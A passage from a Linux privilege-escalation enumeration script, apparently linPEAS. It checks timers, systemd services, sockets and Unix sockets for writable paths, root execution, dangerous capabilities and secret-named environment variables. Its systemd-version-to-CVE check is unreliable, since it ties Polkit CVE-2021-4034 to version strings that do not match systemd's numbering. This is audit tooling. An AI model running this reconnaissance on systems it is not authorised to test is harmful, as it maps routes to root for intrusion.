   6839       echo "Checking $periodic_dir..."
   6840       find "$periodic_dir" -type f -executable 2>/dev/null | while read -r periodic_script; do
   6841         if [ -w "$periodic_script" ]; then
   6842           echo "Writable periodic script: $periodic_script" | sed -${E} "s,.*,${SED_RED_YELLOW},"
   6843           ls -l "$periodic_script" 2>/dev/null
   6844         fi
   6845       done
   6846     done
   6847     echo ""
   6848   fi
   6849 fi
   6850 
   6851 fi
   6852 
   6853 if check_mitre_filter "T1053.003"; then
   6854 if ! [ "$SEARCH_IN_FOLDER" ]; then
   6855   print_2title "System timers" "T1053.003"
   6856   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#timers"
   6857   # Function to check timer content for privilege escalation vectors
   6858   check_timer_content() {
   6859     local timer="$1"
   6860     local findings=""
   6861     # Get the service unit this timer activates
   6862     local service_unit=$(systemctl show "$timer" -p Unit 2>/dev/null | cut -d= -f2)
   6863     if [ -n "$service_unit" ]; then
   6864       # Check if the service runs with elevated privileges
   6865       if systemctl show "$service_unit" -p User 2>/dev/null | grep -q "root"; then
   6866         findings="${findings}RUNS_AS_ROOT: Service runs as root\n"
   6867       fi
   6868       # Get the executable path
   6869       local exec_path=$(systemctl show "$service_unit" -p ExecStart 2>/dev/null | cut -d= -f2 | cut -d' ' -f1)
   6870       if [ -n "$exec_path" ]; then
   6871         if [ -w "$exec_path" ]; then
   6872           findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
   6873         fi
   6874         # Check for relative paths
   6875         case "$exec_path" in
   6876           /*) : ;; # Absolute path, do nothing
   6877           *) findings="${findings}RELATIVE_PATH: Uses relative path: $exec_path\n" ;;
   6878         esac
   6879       fi
   6880       # Check for unsafe configurations
   6881       if systemctl show "$service_unit" -p ExecStart 2>/dev/null | grep -qE '(chmod|chown|mount|sudo|su)'; then
   6882         findings="${findings}UNSAFE_CMD: Uses potentially dangerous commands\n"
   6883       fi
   6884       # Check for weak permissions
   6885       if [ -e "$exec_path" ] && [ "$(stat -c %a "$exec_path" 2>/dev/null)" = "777" ]; then
   6886         findings="${findings}WEAK_PERMS: Executable has 777 permissions\n"
   6887       fi
   6888     fi
   6889     # If any findings, print them
   6890     if [ -n "$findings" ]; then
   6891       echo "Potential privilege escalation in timer: $timer"
   6892       echo "$findings" | while read -r finding; do
   6893         [ -n "$finding" ] && echo "  └─ $finding"
   6894       done
   6895     fi
   6896   }
   6897   # Function to check timer file for privilege escalation vectors
   6898   check_timer_file() {
   6899     local timer_file="$1"
   6900     local findings=""
   6901     # Check if timer file is writable (following symlinks)
   6902     if [ -L "$timer_file" ]; then
   6903       # If it's a symlink, check the target file
   6904       local target_file=$(readlink -f "$timer_file")
   6905       if [ -w "$target_file" ]; then
   6906         findings="${findings}WRITABLE_FILE: Timer target file is writable: $target_file\n"
   6907       fi
   6908     elif [ -w "$timer_file" ]; then
   6909       findings="${findings}WRITABLE_FILE: Timer file is writable\n"
   6910     fi
   6911     # Check for weak permissions (following symlinks)
   6912     if [ "$(stat -L -c %a "$timer_file" 2>/dev/null)" = "777" ]; then
   6913       findings="${findings}WEAK_PERMS: Timer file has 777 permissions\n"
   6914     fi
   6915     # Check for relative paths in Unit directive
   6916     if grep -q "^Unit=[^/]" "$timer_file" 2>/dev/null; then
   6917       findings="${findings}RELATIVE_PATH: Uses relative path in Unit directive\n"
   6918     fi
   6919     # Check for writable executables in Unit directive (following symlinks)
   6920     local unit_path=$(grep -Po '^Unit=*(.*?$)' "$timer_file" 2>/dev/null | cut -d '=' -f2)
   6921     if [ -n "$unit_path" ]; then
   6922       if [ -L "$unit_path" ]; then
   6923         local target_unit=$(readlink -f "$unit_path")
   6924         if [ -w "$target_unit" ]; then
   6925           findings="${findings}WRITABLE_UNIT: Unit target file is writable: $target_unit\n"
   6926         fi
   6927       elif [ -w "$unit_path" ]; then
   6928         findings="${findings}WRITABLE_UNIT: Unit file is writable: $unit_path\n"
   6929       fi
   6930     fi
   6931     # If any findings, print them
   6932     if [ -n "$findings" ]; then
   6933       echo "Potential privilege escalation in timer file: $timer_file"
   6934       echo "$findings" | while read -r finding; do
   6935         [ -n "$finding" ] && echo "  └─ $finding"
   6936       done
   6937     fi
   6938   }
   6939   # List all timers and check for privilege escalation vectors
   6940   print_3title "Active timers:" "T1053.003"
   6941   systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | while read -r line; do
   6942     # Extract timer unit name
   6943     timer_unit=$(echo "$line" | awk '{print $1}')
   6944     if [ -n "$timer_unit" ]; then
   6945       # Check if timer file is writable
   6946       timer_path=$(systemctl show "$timer_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
   6947       if [ -n "$timer_path" ]; then
   6948         check_timer_file "$timer_path"
   6949       fi
   6950       # Check timer content for privilege escalation vectors
   6951       check_timer_content "$timer_unit"
   6952       # Print the timer line with highlighting
   6953       echo "$line" | sed -${E} "s,$timersG,${SED_GREEN},"
   6954     fi
   6955   done || echo_not_found
   6956   # Check for disabled but available timers
   6957   print_3title "Disabled timers:" "T1053.003"
   6958   systemctl list-unit-files --type=timer --state=disabled 2>/dev/null | grep -v "UNIT FILE" | while read -r line; do
   6959     timer_unit=$(echo "$line" | awk '{print $1}')
   6960     if [ -n "$timer_unit" ]; then
   6961       timer_path=$(systemctl show "$timer_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
   6962       if [ -n "$timer_path" ]; then
   6963         check_timer_file "$timer_path"
   6964       fi
   6965     fi
   6966   done || echo_not_found
   6967   # Check timer files from PSTORAGE_TIMER
   6968   if [ -n "$PSTORAGE_TIMER" ]; then
   6969     print_3title "Additional timer files:" "T1053.003"
   6970     printf "%s\n" "$PSTORAGE_TIMER" | while read -r timer_file; do
   6971       if [ -n "$timer_file" ] && [ -e "$timer_file" ]; then
   6972         check_timer_file "$timer_file"
   6973       fi
   6974     done
   6975   fi
   6976   echo ""
   6977 fi
   6978 
   6979 fi
   6980 
   6981 if check_mitre_filter "T1543.002,T1007"; then
   6982 if ! [ "$SEARCH_IN_FOLDER" ]; then
   6983   print_2title "Services and Service Files" "T1543.002,T1007"
   6984   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services"
   6985   # Function to check service content for privilege escalation vectors
   6986   check_service_content() {
   6987     local service="$1"
   6988     local findings=""
   6989     # Check if service runs with elevated privileges
   6990     if systemctl show "$service" -p User 2>/dev/null | grep -q "root"; then
   6991       findings="${findings}RUNS_AS_ROOT: Service runs as root\n"
   6992     fi
   6993     # Get the executable path and check it
   6994     local exec_path=$(systemctl show "$service" -p ExecStart 2>/dev/null | cut -d= -f2 | cut -d' ' -f1)
   6995     if [ -n "$exec_path" ]; then
   6996       if [ -w "$exec_path" ]; then
   6997         findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
   6998       fi
   6999       # Check for relative paths
   7000       #case "$exec_path" in
   7001       #  /*) : ;; # Absolute path, do nothing
   7002       #  *) findings="${findings}RELATIVE_PATH: Uses relative path: $exec_path\n" ;;
   7003       #esac
   7004       # Check for weak permissions
   7005       if [ -e "$exec_path" ] && [ "$(stat -c %a "$exec_path" 2>/dev/null)" = "777" ]; then
   7006         findings="${findings}WEAK_PERMS: Executable has 777 permissions\n"
   7007       fi
   7008     fi
   7009     # Check for unsafe configurations
   7010     if systemctl show "$service" -p ExecStart 2>/dev/null | grep -qE '(chmod|chown|mount|sudo|su)'; then
   7011       findings="${findings}UNSAFE_CMD: Uses potentially dangerous commands\n"
   7012     fi
   7013     # Check for environment variables with sensitive data
   7014     if systemctl show "$service" -p Environment 2>/dev/null | grep -qE '(PASS|SECRET|KEY|TOKEN|CRED)'; then
   7015       findings="${findings}SENSITIVE_ENV: Contains sensitive environment variables\n"
   7016     fi
   7017     # Check for capabilities
   7018     if systemctl show "$service" -p CapabilityBoundingSet 2>/dev/null | grep -qE '(CAP_SYS_ADMIN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH)'; then
   7019       findings="${findings}DANGEROUS_CAPS: Has dangerous capabilities\n"
   7020     fi
   7021     # If any findings, print them
   7022     if [ -n "$findings" ]; then
   7023       echo "  Potential issue in service: $service"
   7024       echo "$findings" | while read -r finding; do
   7025         [ -n "$finding" ] && echo "  └─ $finding"
   7026       done
   7027     fi
   7028   }
   7029   # Function to check service file for privilege escalation vectors
   7030   check_service_file() {
   7031     local service_file="$1"
   7032     local findings=""
   7033     # Check if service file is writable (following symlinks)
   7034     if [ -L "$service_file" ]; then
   7035       # If it's a symlink, check the target file
   7036       local target_file=$(readlink -f "$service_file")
   7037       if ! [ "$IAMROOT" ] && [ -w "$target_file" ] && [ -f "$target_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
   7038         findings="${findings}WRITABLE_FILE: Service target file is writable: $target_file\n"
   7039       fi
   7040     elif ! [ "$IAMROOT" ] && [ -w "$service_file" ] && [ -f "$service_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
   7041       findings="${findings}WRITABLE_FILE: Service file is writable\n"
   7042     fi
   7043     # Check for weak permissions (following symlinks)
   7044     if [ "$(stat -L -c %a "$service_file" 2>/dev/null)" = "777" ]; then
   7045       findings="${findings}WEAK_PERMS: Service file has 777 permissions\n"
   7046     fi
   7047     # Check for relative paths in Exec directives - Original logic
   7048     local relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$service_file" 2>/dev/null | grep -Iv "=/")
   7049     local relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$service_file" 2>/dev/null)
   7050     if [ "$relpath1" ] || [ "$relpath2" ]; then
   7051       if [ "$WRITABLESYSTEMDPATH" ]; then
   7052         findings="${findings}RELATIVE_PATH: Could be executing some relative path (systemd path is writable)\n"
   7053       else
   7054         findings="${findings}RELATIVE_PATH: Could be executing some relative path\n"
   7055       fi
   7056     fi
   7057     # Check for writable executables (following symlinks)
   7058     local exec_paths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$service_file" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
   7059     printf "%s\n" "$exec_paths" | while read -r exec_path; do
   7060       if [ -n "$exec_path" ]; then
   7061         if [ -L "$exec_path" ]; then
   7062           local target_exec=$(readlink -f "$exec_path")
   7063           if [ -w "$target_exec" ]; then
   7064             findings="${findings}WRITABLE_EXEC: Executable target is writable: $target_exec\n"
   7065           fi
   7066         elif [ -w "$exec_path" ]; then
   7067           findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
   7068         fi
   7069       fi
   7070     done
   7071     # If any findings, print them
   7072     if [ -n "$findings" ]; then
   7073       echo "  Potential issue in service file: $service_file"
   7074       echo "$findings" | while read -r finding; do
   7075         [ -n "$finding" ] && echo "  └─ $finding"
   7076       done
   7077     fi
   7078   }
   7079   # List all services and check for privilege escalation vectors
   7080   echo ""
   7081   print_3title "Active services:" "T1543.002,T1007"
   7082   systemctl list-units --type=service --state=active 2>/dev/null | grep -v "UNIT" | while read -r line; do
   7083     service_unit=$(echo "$line" | awk '{print $1}')
   7084     if [ -n "$service_unit" ]; then
   7085       # Print the service line with highlighting
   7086       echo "$line" | sed -${E} "s,$service_unit,${SED_GREEN},"
   7087       # Get service file path
   7088       service_path=$(systemctl show "$service_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
   7089       if [ -n "$service_path" ]; then
   7090         check_service_file "$service_path"
   7091       fi
   7092       # Check service content for privilege escalation vectors
   7093       check_service_content "$service_unit"
   7094     fi
   7095   done || echo_not_found
   7096   # Check for disabled but available services
   7097   echo ""
   7098   print_3title "Disabled services:" "T1543.002,T1007"
   7099   systemctl list-unit-files --type=service --state=disabled 2>/dev/null | grep -v "UNIT FILE" | while read -r line; do
   7100     service_unit=$(echo "$line" | awk '{print $1}')
   7101     if [ -n "$service_unit" ]; then
   7102       # Print the service line with highlighting
   7103       echo "$line" | sed -${E} "s,$service_unit,${SED_GREEN},"
   7104       # Get service file path
   7105       service_path=$(systemctl show "$service_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
   7106       if [ -n "$service_path" ]; then
   7107         check_service_file "$service_path"
   7108       fi
   7109       # Check service content for privilege escalation vectors
   7110       check_service_content "$service_unit"
   7111     fi
   7112   done || echo_not_found
   7113   # Check service files from PSTORAGE_SYSTEMD
   7114   if [ -n "$PSTORAGE_SYSTEMD" ]; then
   7115     echo ""
   7116     print_3title "Additional service files:" "T1543.002,T1007"
   7117     printf "%s\n" "$PSTORAGE_SYSTEMD" | while read -r service_file; do
   7118       if [ -n "$service_file" ] && [ -e "$service_file" ]; then
   7119         check_service_file "$service_file"
   7120       fi
   7121     done
   7122   fi
   7123   # Check for outdated services if EXTRA_CHECKS is enabled
   7124   if [ "$EXTRA_CHECKS" ]; then
   7125     echo ""
   7126     print_3title "Service versions and status:" "T1543.002,T1007"
   7127     if [ "$TIMEOUT" ]; then
   7128       $TIMEOUT 30 sh -c "(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null" || echo_not_found "service|chkconfig|rc-status|launchctl"
   7129     else
   7130       (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl"
   7131     fi
   7132   fi
   7133   # Check systemd path writability
   7134   if [ ! "$WRITABLESYSTEMDPATH" ]; then 
   7135     echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"
   7136   else
   7137     echo "You can write on systemd PATH" | sed -${E} "s,.*,${SED_RED},"
   7138     echo "If a relative path is used, it's possible to abuse it."
   7139   fi
   7140   echo ""
   7141 fi
   7142 
   7143 fi
   7144 
   7145 if check_mitre_filter "T1543.002"; then
   7146 if ! [ "$SEARCH_IN_FOLDER" ]; then
   7147     print_2title "Systemd Information" "T1543.002"
   7148     print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths"
   7149     # Function to check if systemctl is available
   7150     check_systemctl() {
   7151         if ! command -v systemctl >/dev/null 2>&1; then
   7152             echo_not_found "systemctl"
   7153             return 1
   7154         fi
   7155         return 0
   7156     }
   7157     # Function to list running systemd services
   7158     list_running_services() {
   7159         systemctl list-units --type=service --state=running 2>/dev/null
   7160     }
   7161     # Function to get service file path
   7162     get_service_file() {
   7163         local service="$1"
   7164         local file=""
   7165         for path in "/etc/systemd/system/$service" "/lib/systemd/system/$service"; do
   7166             if [ -f "$path" ]; then
   7167                 file="$path"
   7168                 break
   7169             fi
   7170         done
   7171         echo "$file"
   7172     }
   7173     # Function to check dangerous capabilities
   7174     check_dangerous_caps() {
   7175         local caps="$1"
   7176         echo "$caps" | grep -qE '(CAP_SYS_ADMIN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH|CAP_SETUID|CAP_SETGID|CAP_NET_ADMIN)'
   7177         return $?
   7178     }
   7179     # Check systemd version and known vulnerabilities
   7180     print_list "Systemd version and vulnerabilities? .............. "$NC
   7181     if check_systemctl; then
   7182         version=$(systemctl --version | head -n 1 | grep -oE '([0-9]+(\.[0-9]+)+)')
   7183         if [ -n "$version" ]; then
   7184             echo "$version" | sed -${E} "s,([0-9]+(\.[0-9]+)+),${SED_RED},g"
   7185             # Check for known vulnerable versions
   7186             case "$version" in
   7187                 "2.3"[0-4]|"2.3"[0-4]"."*)
   7188                     echo "  └─ Vulnerable to CVE-2021-4034 (Polkit)" | sed -${E} "s,.*,${SED_RED},g"
   7189                     ;;
   7190                 "2.4"[0-9]|"2.4"[0-9]"."*)
   7191                     echo "  └─ Vulnerable to CVE-2021-33910 (systemd-tmpfiles)" | sed -${E} "s,.*,${SED_RED},g"
   7192                     ;;
   7193             esac
   7194         fi
   7195     fi
   7196     # Check for systemd services running as root
   7197     print_list "Services running as root? ..... "$NC
   7198     if check_systemctl; then
   7199         list_running_services | 
   7200         grep -E "root|0:0" | 
   7201         while read -r line; do
   7202             service=$(echo "$line" | awk '{print $1}')
   7203             user=$(systemctl show "$service" -p User 2>/dev/null | cut -d= -f2)
   7204             echo "$service (User: $user)" | sed -${E} "s,root|0:0,${SED_RED},g"
   7205         done
   7206         echo ""
   7207     else
   7208         echo ""
   7209     fi
   7210     # Check for systemd services with dangerous capabilities
   7211     print_list "Running services with dangerous capabilities? ... "$NC
   7212     if check_systemctl; then
   7213         list_running_services | 
   7214         grep -E "\.service" | 
   7215         while read -r line; do
   7216             service=$(echo "$line" | awk '{print $1}')
   7217             caps=$(systemctl show "$service" -p CapabilityBoundingSet 2>/dev/null | cut -d= -f2)
   7218             if [ -n "$caps" ] && check_dangerous_caps "$caps"; then
   7219                 echo "$service: $caps" | sed -${E} "s,.*,${SED_RED},g"
   7220             fi
   7221         done
   7222         echo ""
   7223     else
   7224         echo ""
   7225     fi
   7226     # Check for systemd services with writable paths
   7227     print_list "Services with writable paths? . "$NC
   7228     if check_systemctl; then
   7229         list_running_services | 
   7230         grep -E "\.service" | 
   7231         while read -r line; do
   7232             service=$(echo "$line" | awk '{print $1}')
   7233             service_file=$(get_service_file "$service")
   7234             if [ -n "$service_file" ]; then
   7235                 # Check service-specific PATH entries (Environment=PATH=...)
   7236                 svc_writable_path=$(grep -E '^Environment=.*PATH=' "$service_file" 2>/dev/null | sed -E 's/^Environment=//; s/^"//; s/"$//; s/^PATH=//' | tr ':' '\n' | while read -r svc_path_entry; do
   7237                     [ -z "$svc_path_entry" ] && continue
   7238                     if [ -d "$svc_path_entry" ] && [ -w "$svc_path_entry" ]; then
   7239                         echo "$svc_path_entry"
   7240                     fi
   7241                 done)
   7242                 if [ "$svc_writable_path" ]; then
   7243                     for svc_path_entry in $svc_writable_path; do
   7244                         echo "$service: Writable service PATH entry '$svc_path_entry'" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   7245                     done
   7246                 fi
   7247                 # Check ExecStart paths
   7248                 grep -E "ExecStart|ExecStartPre|ExecStartPost" "$service_file" 2>/dev/null | 
   7249                 while read -r exec_line; do
   7250                     # Extract command from the right side of Exec*=, not from argv
   7251                     exec_value="${exec_line#*=}"
   7252                     exec_value=$(echo "$exec_value" | sed 's/^[[:space:]]*//')
   7253                     cmd=$(echo "$exec_value" | awk '{print $1}' | tr -d '"')
   7254                     # Strip systemd command prefixes (-, @, :, +, !) before path checks
   7255                     cmd_path=$(echo "$cmd" | sed -E 's/^[-@:+!]+//')
   7256                     # Only check the command path, not arguments
   7257                     if [ -n "$cmd_path" ] && [ -w "$cmd_path" ]; then
   7258                         echo "$service: $cmd_path (from $exec_line)" | sed -${E} "s,.*,${SED_RED},g"
   7259                     fi
   7260                     # Check for relative paths only in the command, not arguments
   7261                     if [ -n "$cmd_path" ] && [ "${cmd_path#/}" = "$cmd_path" ] && [ "${cmd_path#\$}" = "$cmd_path" ]; then
   7262                         echo "$service: Uses relative path '$cmd_path' (from $exec_line)" | sed -${E} "s,.*,${SED_RED},g"
   7263                         if [ "$svc_writable_path" ]; then
   7264                             echo "$service: Relative Exec path + writable service PATH can allow path hijacking" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
   7265                         fi
   7266                     fi
   7267                 done
   7268             fi
   7269         done
   7270     else
   7271         echo ""
   7272     fi
   7273     echo ""
   7274     print_2title "Systemd PATH" "T1543.002"
   7275     print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths"
   7276     if check_systemctl; then
   7277         systemctl show-environment 2>/dev/null | 
   7278         grep "PATH" | 
   7279         while read -r path_line; do
   7280             echo "$path_line" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g"
   7281             # Store writable paths for later use
   7282             if echo "$path_line" | grep -qE "$Wfolders"; then
   7283                 WRITABLESYSTEMDPATH="$path_line"
   7284             fi
   7285         done
   7286     fi
   7287     echo ""
   7288 fi
   7289 
   7290 fi
   7291 
   7292 if check_mitre_filter "T1559"; then
   7293 if ! [ "$IAMROOT" ]; then
   7294     print_2title "Analyzing .socket files" "T1559"
   7295     print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets"
   7296     # Function to check if path is relative
   7297     is_relative_path() {
   7298         local lpath="$1"
   7299         case "$lpath" in
   7300             /*) return 1 ;; # Absolute path
   7301             *) return 0 ;;  # Relative path
   7302         esac
   7303     }
   7304     # Function to check socket file content
   7305     check_socket_file() {
   7306         local socket_file="$1"
   7307         local findings=""
   7308         # Check if socket file is writable (following symlinks)
   7309         if [ -L "$socket_file" ]; then
   7310             # If it's a symlink, check the target file
   7311             local target_file=$(readlink -f "$socket_file")
   7312             if ! [ "$IAMROOT" ] && [ -w "$target_file" ] && [ -f "$target_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
   7313                 findings="${findings}WRITABLE_FILE: Socket target file is writable: $target_file\n"
   7314             fi
   7315         elif ! [ "$IAMROOT" ] && [ -w "$socket_file" ] && [ -f "$socket_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
   7316             findings="${findings}WRITABLE_FILE: Socket file is writable\n"
   7317         fi
   7318         # Check for weak permissions (following symlinks)
   7319         if [ "$(stat -L -c %a "$socket_file" 2>/dev/null)" = "777" ]; then
   7320             findings="${findings}WEAK_PERMS: Socket file has 777 permissions\n"
   7321         fi
   7322         # Check for executables (following symlinks)
   7323         local exec_paths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$socket_file" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
   7324         printf "%s\n" "$exec_paths" | while read -r exec_path; do
   7325             if [ -n "$exec_path" ]; then
   7326                 # Check if executable is writable (following symlinks)
   7327                 if [ -L "$exec_path" ]; then
   7328                     local target_exec=$(readlink -f "$exec_path")
   7329                     if [ -w "$target_exec" ]; then
   7330                         findings="${findings}WRITABLE_EXEC: Executable target is writable: $target_exec\n"
   7331                     fi
   7332                     # Check for weak permissions on target
   7333                     if [ -e "$target_exec" ] && [ "$(stat -L -c %a "$target_exec" 2>/dev/null)" = "777" ]; then
   7334                         findings="${findings}WEAK_EXEC_PERMS: Executable target has 777 permissions: $target_exec\n"
   7335                     fi
   7336                 else
   7337                     if [ -w "$exec_path" ]; then
   7338                         findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
   7339                     fi
   7340                     # Check for weak permissions
   7341                     if [ -e "$exec_path" ] && [ "$(stat -L -c %a "$exec_path" 2>/dev/null)" = "777" ]; then
   7342                         findings="${findings}WEAK_EXEC_PERMS: Executable has 777 permissions: $exec_path\n"
   7343                     fi
   7344                 fi
   7345                 # Check for relative paths
   7346                 if is_relative_path "$exec_path"; then
   7347                     findings="${findings}RELATIVE_PATH: Uses relative path: $exec_path\n"
   7348                 fi
   7349             fi
   7350         done
   7351         # Check for listeners (following symlinks)
   7352         local listen_paths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$socket_file" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
   7353         printf "%s\n" "$listen_paths" | while read -r listen_path; do
   7354             if [ -n "$listen_path" ]; then
   7355                 # Check if listener path is writable (following symlinks)
   7356                 if [ -L "$listen_path" ]; then
   7357                     local target_listen=$(readlink -f "$listen_path")
   7358                     if [ -w "$target_listen" ]; then
   7359                         findings="${findings}WRITABLE_LISTENER: Listener target path is writable: $target_listen\n"
   7360                     fi
   7361                     # Check for weak permissions on target
   7362                     if [ -e "$target_listen" ] && [ "$(stat -L -c %a "$target_listen" 2>/dev/null)" = "777" ]; then
   7363                         findings="${findings}WEAK_LISTENER_PERMS: Listener target path has 777 permissions: $target_listen\n"
   7364                     fi
   7365                 else
   7366                     if [ -w "$listen_path" ]; then
   7367                         findings="${findings}WRITABLE_LISTENER: Listener path is writable: $listen_path\n"
   7368                     fi
   7369                     # Check for weak permissions
   7370                     if [ -e "$listen_path" ] && [ "$(stat -L -c %a "$listen_path" 2>/dev/null)" = "777" ]; then
   7371                         findings="${findings}WEAK_LISTENER_PERMS: Listener path has 777 permissions: $listen_path\n"
   7372                     fi
   7373                 fi
   7374                 # Check for relative paths
   7375                 if is_relative_path "$listen_path"; then
   7376                     findings="${findings}RELATIVE_LISTENER: Uses relative path: $listen_path\n"
   7377                 fi
   7378             fi
   7379         done
   7380         # Check for unsafe configurations
   7381         if grep -qE '^(User|Group)=root' "$socket_file" 2>/dev/null; then
   7382             findings="${findings}ROOT_USER: Socket runs as root\n"
   7383         fi
   7384         if grep -qE '^(CapabilityBoundingSet).*CAP_SYS_ADMIN' "$socket_file" 2>/dev/null; then
   7385             findings="${findings}DANGEROUS_CAPS: Has dangerous capabilities\n"
   7386         fi
   7387         if grep -qE '^(BindIP|BindIPv6Only)=yes' "$socket_file" 2>/dev/null; then
   7388             findings="${findings}NETWORK_BIND: Can bind to network interfaces\n"
   7389         fi
   7390         # If any findings, print them
   7391         if [ -n "$findings" ]; then
   7392             echo "Potential privilege escalation in socket file: $socket_file"
   7393             echo "$findings" | while read -r finding; do
   7394                 [ -n "$finding" ] && echo "  └─ $finding" | sed -${E} "s,WRITABLE.*,${SED_RED},g" | sed -${E} "s,RELATIVE.*,${SED_RED_YELLOW},g"
   7395             done
   7396         fi
   7397     }
   7398     # Process each socket file
   7399     if [ -n "$PSTORAGE_SOCKET" ]; then
   7400         printf "%s\n" "$PSTORAGE_SOCKET" | while read -r socket_file; do
   7401             if [ -n "$socket_file" ] && [ -e "$socket_file" ]; then
   7402                 check_socket_file "$socket_file"
   7403             fi
   7404         done
   7405     else
   7406         print_list "No socket files found" "$NC"
   7407     fi
   7408     echo ""
   7409 fi
   7410 
   7411 fi
   7412 
   7413 if check_mitre_filter "T1571,T1049"; then
   7414 if ! [ "$IAMROOT" ]; then
   7415     if ! [ "$SEARCH_IN_FOLDER" ]; then
   7416         print_2title "Unix Sockets Analysis" "T1571,T1049"
   7417         print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets"
   7418         # Function to get socket permissions
   7419         get_socket_perms() {
   7420             local socket="$1"
   7421             local perms=""
   7422             # Check read permission
   7423             if [ -r "$socket" ]; then
   7424                 perms="Read "
   7425             fi
   7426             # Check write permission
   7427             if [ -w "$socket" ]; then
   7428                 perms="${perms}Write "
   7429             fi
   7430             # Check execute permission
   7431             if [ -x "$socket" ]; then
   7432                 perms="${perms}Execute "
   7433             fi
   7434             # Check socket mode
   7435             local mode=$(stat -c "%a" "$socket" 2>/dev/null)
   7436             if [ "$mode" = "777" ] || [ "$mode" = "666" ]; then
   7437                 perms="${perms}(Weak Permissions: $mode) "
   7438             fi
   7439             echo "$perms"
   7440         }
   7441         # Function to check socket connectivity
   7442         check_socket_connectivity() {
   7443             local socket="$1"
   7444             local perms="$2"
   7445             if [ "$EXTRA_CHECKS" ] && command -v curl >/dev/null 2>&1; then
   7446                 # Try to connect to the socket
   7447                 if curl -v --unix-socket "$socket" --max-time 1 http:/linpeas 2>&1 | grep -iq "Permission denied"; then
   7448                     perms="${perms} - Cannot Connect"
   7449                 else
   7450                     perms="${perms} - Can Connect"
   7451                 fi
   7452             fi
   7453             echo "$perms"
   7454         }
   7455         # Function to analyze socket protocol
   7456         analyze_socket_protocol() {
   7457             local socket="$1"
   7458             local owner="$2"
   7459             local response=""
   7460             # Try to get HTTP response
   7461             if command -v curl >/dev/null 2>&1; then
   7462                 response=$(curl --max-time 2 --unix-socket "$socket" http:/index 2>/dev/null)
   7463                 if [ $? -eq 0 ]; then
   7464                     echo "  └─ HTTP Socket (owned by $owner):" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
   7465                     echo "     └─ Response to /index (limit 30):"
   7466                     echo "$response" | head -n 30 | sed 's/^/       /'
   7467                 fi
   7468             fi
   7469         }
   7470         # Function to get socket owner and group
   7471         get_socket_owner() {
   7472             local socket="$1"
   7473             local owner=""
   7474             local group=""
   7475             if [ -e "$socket" ]; then
   7476                 owner=$(ls -l "$socket" 2>/dev/null | awk '{print $3}')
   7477                 group=$(ls -l "$socket" 2>/dev/null | awk '{print $4}')
   7478                 echo "$owner:$group"
   7479             fi
   7480         }
   7481         # Collect listening sockets using multiple methods
   7482         unix_scks_list=""
   7483         for cmd in "ss -xlp -H state listening" "ss -l -p -A 'unix'" "netstat -a -p --unix"; do
   7484             if [ -z "$unix_scks_list" ]; then
   7485                 unix_scks_list=$($cmd 2>/dev/null | grep -Eo "/[a-zA-Z0-9\._/\-]+" | grep -v " " | sort -u)
   7486             fi
   7487         done
   7488         # Get additional socket information
   7489         if [ -z "$unix_scks_list" ]; then
   7490             unix_scks_list=$(lsof -U 2>/dev/null | awk '{print $9}' | grep "/" | sort -u)
   7491         fi
   7492         # Find socket files
   7493         if ! [ "$SEARCH_IN_FOLDER" ]; then
   7494             unix_scks_list2=$(find / -type s 2>/dev/null)
   7495         else
   7496             unix_scks_list2=$(find "$SEARCH_IN_FOLDER" -type s 2>/dev/null)
   7497         fi
   7498         # Process all found sockets
   7499         (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2") | sort -u | while read -r socket; do
   7500             if [ -n "$socket" ] && [ -e "$socket" ]; then
   7501                 # Get socket information
   7502                 perms=$(get_socket_perms "$socket")
   7503                 perms=$(check_socket_connectivity "$socket" "$perms")
